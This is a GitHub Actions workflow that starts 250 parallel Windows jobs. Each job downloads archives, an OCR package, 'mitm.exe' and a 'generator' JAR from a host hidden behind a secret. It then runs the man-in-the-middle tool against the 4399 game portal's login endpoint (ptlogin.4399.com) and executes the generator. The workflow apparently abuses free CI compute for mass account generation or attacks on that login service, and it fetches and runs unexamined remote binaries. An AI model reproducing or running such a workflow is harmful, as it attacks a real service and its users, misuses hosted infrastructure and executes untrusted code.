name: qwq
on:
  push:
  issues:
  workflow_dispatch: 

jobs:
  worker:
    runs-on: windows-latest
    strategy:
      matrix:
        base: [1, 2, 3, 4, 5]
        next: [1, 2, 3, 4, 5]
        final: [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]
    steps:
    - uses: actions/checkout@v7
    - uses: actions/setup-java@v5
      with:
        distribution: 'temurin'
        java-version: '25'
    - name: Setup Env
      run: |
        curl -sS -o sfz.7z.001 https://${{ secrets.REMOTE }}/sfz.7z.001
        curl -sS -o sfz.7z.002 https://${{ secrets.REMOTE }}/sfz.7z.002
        curl -sS -o sfz.7z.003 https://${{ secrets.REMOTE }}/sfz.7z.003
        curl -sS -o ocr.7z https://${{ secrets.REMOTE }}/ocr.7z
        
        7z x sfz.7z.001 -oD:\a\_temp\
        7z x ocr.7z -oD:\a\_temp\
        
        Move-Item .\config.json D:\a\_temp\ -Force
        cd "D:\a\_temp\"

        curl -o mitm.exe https://${{ secrets.REMOTE }}/mitm.exe
        curl -o application.jar https://${{ secrets.REMOTE }}/generator_2k26.8.26.jar
    - name: Work
      run: |
        cd "D:\a\_temp\"
        Start-Process ".\mitm.exe" -ArgumentList "8888 ptlogin.4399.com" -NoNewWindow
        java -jar application.jar
